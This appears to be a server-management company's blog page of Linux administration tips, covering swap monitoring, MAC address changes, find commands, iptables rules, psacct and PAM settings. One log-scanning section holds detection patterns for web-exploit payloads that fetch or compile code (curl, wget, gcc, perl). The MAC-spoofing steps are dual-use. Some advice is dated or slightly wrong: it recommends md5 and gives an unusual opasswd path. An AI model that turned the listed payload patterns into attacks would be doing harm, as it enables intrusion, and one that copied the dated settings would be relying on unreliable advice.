365 Hosting support | Server Management Provider

365hostingsupport ultimate source of Server Security, cPanel server management and monitoring. Since 2012 we are offering top class technical support services at lowest prices. We offer 100% Satisfaction with 7 Days Money Back Guarantee.

365 Hosting support |  Server Management Provider - 365hostingsupport ultimate source of Server Security, cPanel server management and monitoring. Since 2012 we are offering top class technical support services at lowest prices. We offer 100% Satisfaction with 7 Days Money Back Guarantee.

How to check Swap Usage on per process basis using “top”

How to check swap Usage on per process basis using “top”

We normally use the free command or some other commands to check for the memory utilization and the swap memory consumption. However, at times we find it difficult to find what process is consuming what part of the swap memory. We can achieve this via the top command.

The simple top command will provide you the dynamic output of the processes running on the server. But when tweaked and applied with some commands, it will display the swap memory consumption on per process basis. Following is how you can accomplish this:

After issuing the top command, you need to press the f key which basically allows you to add or remove Fields/Columns from the output for top command.

Once done that you will get a list of fields which can be added with various different alphabets. You will find the following in the given output:

p: SWAP       = Swapped size (kb)

All you have to do is, hit p and then press the enter key. This will return you to the output for top command with additional field of “SWAP” in it.

The following is how the output will look like from the top command:

top – 19:06:29 up 10 day,  6:05,  5 users,  load average: 0.54, 0.30, 0.21
Tasks: 151 total,   1 running, 150 sleeping,   0 stopped,   0 zombie
Cpu(s):  7.2%us,  1.6%sy,  0.0%ni, 91.1%id,  0.0%wa,  0.2%hi,  0.0%si,  0.0%st
Mem:   2062160k total,  1901188k used,   160972k free,   157844k buffers
Swap:  4194296k total,     4840k used,  4189456k free,   864716k cached

PID USER      PR  NI  VIRT  RES  SHR S %CPU %MEM    TIME+  SWAP COMMAND
27413 root      20   0  331m 150m  28m S    8  7.5   4:01.31 181m mysqld
5311 root      20   0  560m 163m  12m S    8  8.1  50:36.30 397m Xorg
5835 hradm     20   0 31024  22m 7504 S    1  1.1   8:13.29 7768 python
5881 hradm     20   0 24368  11m 8620 S    1  0.6   0:44.46  11m rcu_bh
5954 hradm     20   0 82824  26m  12m S    1  1.3   0:10.06  54m rcu_bh
24398 hradm     20   0 3068m  47m  23m S    1  2.3   0:29.86 3.0g python
27886 root      20   0  2416 1176  880 R    1  0.1   0:00.16 1240 top
5850 hradm     20   0 75552  26m  14m S    0  1.3   2:36.44  47m rcu_sched
6143 hradm     20   0 46172  23m  11m S    0  1.2   2:21.15  21m xchat
1 root      20   0  3056 1896  576 S    0  0.1   0:01.16 1160 init

Changing of MAC address for NIC on a linux Server.

Changing of MAC address for NIC on a linux Server.

following are the steps to do it.

Change MAC address for NIC

1. Verify the current configuration for NIC loaded as eth0 (or anyother on your machine)

[root@hr-root]# ifconfig eth0

eth0      Link encap:Ethernet  HWaddr 00:B0:82:4C:59:7A
inet addr:xxx.xxx.xxx.xxx  Bcast:xxx.xxx.xxx.xxx  Mask:255.255.248.0
inet6 addr: fc70::2w0:51df:ge45:296g/64 Scope:Link
UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
RX packets:1711272688 errors:0 dropped:0 overruns:0 frame:0
TX packets:1686766955 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:241108923046 (224.5 GiB)  TX bytes:507398519867 (472.5 GiB)
Interrupt:24

Shut down the interface for which the MAC address is to be spoofed:

[root@hr-root]# ifconfig eth0 down

Modify the MAC address for the interface (NIC) using the following command:

[root@hr-root]# ifconfig eth0 hw ether 00:22:44:66:88:99

Start off the network interface

[root@hr-root]# ifconfig eth0 up

The interface eth0 should now be up with the spoofed / changed / modified MAC address.

You can verify it using the ifconfig command:

[root@hr-root]# ifconfig eth0

eth0      Link encap:Ethernet  HWaddr 00:22:44:66:88:99
inet addr:xxx.xxx.xxx.xxx  Bcast:xxx.xxx.xxx.xxx  Mask:255.255.248.0
inet6 addr: fc70::2w0:51df:ge45:296g/64 Scope:Link
UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
RX packets:1711272873 errors:0 dropped:0 overruns:0 frame:0
TX packets:1686765748 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:241108923046 (224.5 GiB)  TX bytes:507398519867 (472.5 GiB)
Interrupt:24

You can also verify the MAC addresses on your machine using the arp command. The following is the actual command you can use:

[root@hr-root]# arp -a

You can make these changes permanent by adding the above three commands (used to modify the MAC address) in /etc/rc.local file.

Thats it.

 

How to Find files without any owner or group

How to Find files without any owner or group

For server security audit you must find the files which aren’t being owned by any user. In such case you can use the find command to look for such files.

The following command will list the files which aren’t being owned by any user:

[root@hr-root~]# find / -nouser

Similarly you can find the files which does not belong to any group:

[root@hr-root]# find / -nogroup

So take for example, we have a user(s) leaving the organization and we delete the user with recursive option (userdel -r USERNAME), it will delete the home directory and it’s contents. However, it won’t delete the files being owned by that user in other folders.

In such case we can use the following command to identify such files:

[root@hr-root]# find / -nouser -nogroup

So depending on the requirement, we can either delete those files or change the ownership (user & group) for such files.

How to check Apache Exploit

Using following commands we can try to find apache exploite on the server

for i in `locate access_log` ; do echo $i ; egrep -i ‘(chr\(|system\()|(curl|wget|chmod|gcc|perl)%20’ $i ; done

OR

egrep -i ‘(chr\(|system\()|(curl|wget|chmod|gcc|perl)%20’ /path/to/log/files/*
cPanel
egrep -i ‘(chr\(|system\()|(curl|wget|chmod|gcc|perl)%20’ /usr/local/apache/logs/*

Ensim
egrep -i ‘(chr\(|system\()|(curl|wget|chmod|gcc|perl)%20’/home/virtual/site*/fst/var/log/httpd/*

Plesk
egrep -i ‘(chr\(|system\()|(curl|wget|chmod|gcc|perl)%20’ /home/httpd/vhosts/*/statistics/logs/*
egrep -i ‘(chr\(|system\()|(curl|wget|chmod|gcc|perl)%20’ /var/log/httpd/*

Search for Shell Code:
cat /path/to/access/logs/* |grep “/x90/”

 

 

 

Find command : How to use it

Search and list all files from current directory and down for the string XYZ:

find ./ -name “*” -exec grep -H XYZ{} \;
find ./ -type f -print | xargs grep -H “XYZ” /dev/null
egrep -r XYZ *

Find all files of a given type from current directory on down:

find ./ -name “*.conf” –print

Find all user files larger than 5Mb:

find /home -size +5000000c –print

Find all files owned by a user (defined by user id number) on the system: (could take a long time)

find / -user 501 –print

Find all files created or updated in the last five minutes: (Great for finding effects of make install)

find / -cmin -5

Find all world writable directories:

find / -perm -0002 -type d –print

Find all world writable files:

find / -perm -0002 -type f -print

find / -perm -2 ! -type l -ls

Find files with no user:

find / -nouser -o -nogroup –print

Find files modified in the last two days:

find / -mtime 2 -o -ctime 2

finding files in a directory that are older than 3 days and deleting them:

find /directoryname -type f -mtime +3 -exec rm {} \;

SYN Attack and DOS Attack Protection

Please add the following rules in your iptables.
#Protect from SYN Attack
-A INPUT -p tcp –tcp-flags ALL NONE -j DROP
-A INPUT -p tcp –tcp-flags SYN,FIN SYN,FIN -j DROP
-A INPUT -p tcp –tcp-flags SYN,RST SYN,RST -j DROP
-A INPUT -p tcp –tcp-flags FIN,RST FIN,RST -j DROP
-A INPUT -p tcp –tcp-flags ACK,FIN FIN -j DROP
-A INPUT -p tcp –tcp-flags ACK,PSH PSH -j DROP
-A INPUT -p tcp –tcp-flags ACK,URG URG -j DROP
-A INPUT -i eth0 -p tcp -m state –state NEW -m tcp –sport 1024:65535 –dport 20 -j ACCEPT
-A INPUT -i eth0 -p tcp -m tcp –sport 1024:65535 –dport 1024:65535 -m state –state ESTABLISHED -j ACCEPT
-A OUTPUT -o eth0 -p tcp -m tcp –sport 1024:65535 –dport 1024:65535 -m state –state RELATED,ESTABLISHED -j ACCEPT
iptables -A FORWARD -m state –state NEW -p tcp -m multiport –dport http,https -o eth0 -m limit –limit 120/min –limit-burst 15 -j ACCEPT

 

How to trace Command History for all users

How to trace Command History for all users

psacct is an important utility which can be used to detected the command history for all the users in a real time environment. The actual command to find this out if lastcomm.

This utility (psacct) is present on all RHEL servers, but disabled at the startup. You need to start psacct via the init.d initialization script or enable it in the chkconfig.

[root@hr-root~]# lastcomm

The above command will display all the command history from all the users.

The output of lastcomm in particular can be very important to investigate the command history.

For each entry in the output for psacct, the following information is printed:
+ command name of the process
+ flags, as recorded by the system accounting routines:
S — command executed by super-user
F — command executed after a fork but without a following exec
C — command run in PDP-11 compatibility mode (VAX only)
D — command terminated with the generation of a core file
X — command was terminated with the signal SIGTERM
+ the name of the user who ran the process
+ time the process exited

The psacct package contains several utilities for monitoring process activities, including ac, lastcomm, accton, and sa.

* ac – displays statistics about how long users have been logged on.
* lastcomm – displays information about previously executed commands.
* accton – turns process accounting on or off.
* sa – summarizes information about previously executed commands.

Pluggable Authentication Module: How to restrict use of previous password

PAM (Pluggable Authentication Module) in Linux can very well take care of this. PAM takes care of the basic authentication and account management on a Linux server. PAM can also maintain the list of old passwords for users. So if the user changes his/her password, the module will check that with the list of previous passwords and force the user to select a different password.

So the following is the file that needs to be modified on a RHEL/CentOS/Fedora box:

[root@hr-root ~}# vim /etc/pam.d/system-auth

And append the following,

password sufficient pam_unix.so use_authtok md5 shadow

Make the line look like something below:

password sufficient pam_unix.so use_authtok md5 shadow remember=5

Save and close the file.

The server will now remember the last 5 passwords for all the users. And won’t allow the user to modify the password if it is one of the last 5 passwords.

The old passwords are stored in /etc/pam.d/opasswd.

Disable files with unwanted SUID & GUID

An SUID/GUID enabled file can be dangerous when the system is being shared by multiple users. It is always better to run a routine audit for such files.

You can use the following small find command combinations to find all the files with SUID or GUID enabled:

Find all files on the server with SUID permission on them:

[root@hr-root ~]# find / -perm +4000

Find all files on the server with GUID permission on them:

[root@hr-root ~]# find / -perm +2000

Find all files on the server with SUID and/or GUID permission on them at the same time:

[root@hr-root ~]# find / \( -perm -4000 -o -perm -2000 \) -print